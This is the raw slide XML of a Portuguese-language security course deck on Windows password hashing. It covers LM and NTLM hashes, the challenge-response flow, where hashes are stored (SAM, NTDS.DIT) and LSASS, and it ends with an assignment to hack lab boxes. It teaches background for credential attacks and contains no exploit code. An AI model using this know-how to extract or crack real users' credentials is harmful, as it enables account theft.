            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>finalizou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>curso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/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6601" y="2300016"/>
            <a:ext cx="109556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Sua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>missão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escolher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Caixas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> (Boxes) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://docs.google.com/spreadsheets/d/1hKSdOsd3khdydoa-xSfivyKa01caV4frstpVUdgNorw/edit?usp=sharing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6601" y="3325873"/>
            <a:ext cx="89734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Hackeie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mesmas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escreva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>relatório</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>detalhado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> com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passos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>realizados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> para:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>projetos@cysource.com.br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6601" y="4351730"/>
            <a:ext cx="11218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Ao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terminar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>você</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>receberá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>telefonema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> para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ajudar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preparo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> para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dirty="0" err="1"/>
              <a:t>entrevista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trabalho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nessa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>área</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="433554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517715" y="2164074"/>
            <a:ext cx="8450263" cy="138747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Hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068561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430213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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How Passwords works – Challenge response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Smiley Face 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684654" y="2060811"/>
            <a:ext cx="750627" cy="73698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702257" y="2429301"/>
            <a:ext cx="509061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8175009" y="1726440"/>
            <a:ext cx="2306471" cy="14057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Windows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84549" y="2429300"/>
            <a:ext cx="2241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SuperSecretPassword</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Smiley Face 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991947" y="3591634"/>
            <a:ext cx="1443334" cy="1417093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175008" y="3257264"/>
            <a:ext cx="2306471" cy="21881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Windows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463585" y="4123900"/>
            <a:ext cx="39819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D6EEC67681A3BE111B5605849505628F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2702256" y="3755409"/>
            <a:ext cx="509061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817203" y="3384223"/>
            <a:ext cx="28989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Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NEGOTIATE_MESSAGE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2725717" y="4123900"/>
            <a:ext cx="506715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187041" y="3775458"/>
            <a:ext cx="43863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Server responds with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CHALLENGE_MESSAGE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2725717" y="4926842"/>
            <a:ext cx="509061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793957" y="4568455"/>
            <a:ext cx="4979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Client responds with an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AUTHENTICATE_MESSAGE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1352676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/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="22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430213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Hashing History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2548" y="1744914"/>
            <a:ext cx="25747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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>LM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> hash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2548" y="2573461"/>
            <a:ext cx="875226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Lan Manager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Usado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> no windows NT/98.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Usa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>criptografia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> DEC.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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>criptografia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>funciona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>chave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>conhecida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>KGS!@#$%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4201834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430213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Hashing History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424821" y="524812"/>
            <a:ext cx="25747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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>LM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> hash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06399" y="924858"/>
            <a:ext cx="339368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thisISmypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1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3845438" y="1755855"/>
            <a:ext cx="1158766" cy="11587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861505" y="2961952"/>
            <a:ext cx="14478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thisISm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6614640" y="1755855"/>
            <a:ext cx="1269242" cy="12692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500085" y="2961952"/>
            <a:ext cx="15792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ypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3578820" y="3546727"/>
            <a:ext cx="6601" cy="8423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189010" y="4389068"/>
            <a:ext cx="28151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</a:rPr>
              <a:t>D478C5B5AB58795A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8057100" y="3548637"/>
            <a:ext cx="6601" cy="8423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713812" y="4389067"/>
            <a:ext cx="26997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</a:rPr>
              <a:t>B7624FF226D45722</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596607" y="4850733"/>
            <a:ext cx="2149100" cy="9124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6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5972309" y="4850732"/>
            <a:ext cx="2091392" cy="9124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341896" y="5822958"/>
            <a:ext cx="5285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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D478C5B5AB58795AB7624FF226D45722</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3940615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7" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>
      <p:bldP spid="16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430213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Hashing History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3466" y="1515783"/>
            <a:ext cx="30973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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>NTLM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> hash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2130253"/>
            <a:ext cx="791684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Nova </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Tecnologia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de Lan Manager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Usa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> MD4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Sempre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> um hash no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>comprimento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de 32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>caracteres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Permite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>uso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>senha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de 127 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>caracteres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Sabe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> lidar com UNICODE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466" y="4131419"/>
            <a:ext cx="11907870" cy="2023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704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430213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Hash Location storage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295" y="1635611"/>
            <a:ext cx="1081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SAM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295" y="2146245"/>
            <a:ext cx="83720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Security Account Manager (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gerenciador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>seguran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>ça</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> da conta)</a:t>
            </a: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No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>arquivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ambiente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>domínio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>NTDS.DIT</a:t>
            </a:r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60158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430213"/>
            <a:ext cx="10220325" cy="896937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Passwords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295" y="1171143"/>
            <a:ext cx="43702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Password flow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1446663" y="4080679"/>
            <a:ext cx="1746913" cy="7779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LSA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32764" y="4858602"/>
            <a:ext cx="2517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Local Security Authority </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7959591" y="4080679"/>
            <a:ext cx="1746913" cy="7779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LSASS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23880" y="4858603"/>
            <a:ext cx="4274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Local Security Authority Subsystem Service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397526" y="1925685"/>
            <a:ext cx="2601502" cy="777923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WINLOGON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2059710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Personalizar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56E03BE3544194A9711D8E727977D0B" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a0461d9f18494fcf3d666a9b55801854">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0de1bb88-64f6-4f17-8933-73fd235044ff" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7ff04b9cd91440e018d95297d8933c08" ns2:_="">
    <xsd:import namespace="0de1bb88-64f6-4f17-8933-73fd235044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e1bb88-64f6-4f17-8933-73fd235044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6313240-0413-4480-A4BC-48A0D929CA72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89782888-F165-4D38-9B75-55A09B9699F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51477F0-7603-494F-AA43-6E80A6FC74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de1bb88-64f6-4f17-8933-73fd235044f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28942</TotalTime>
  <Words>656</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>118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Ariel</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>2_Office Theme</vt:lpstr>
      <vt:lpstr>Personalizar design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Passwords - Senhas</vt:lpstr>
      <vt:lpstr>Hashing</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Parabéns você finalizou o curso!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Exploits And Metasploit</dc:title>
  <dc:creator>shai</dc:creator>
  <cp:lastModifiedBy>Luli Rosenberg</cp:lastModifiedBy>
  <cp:revision>101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T08:36:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-06T13:15:59Z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0x010100D56E03BE3544194A9711D8E727977D0B</vt:lpwstr>
  </property>
</Properties>
</file>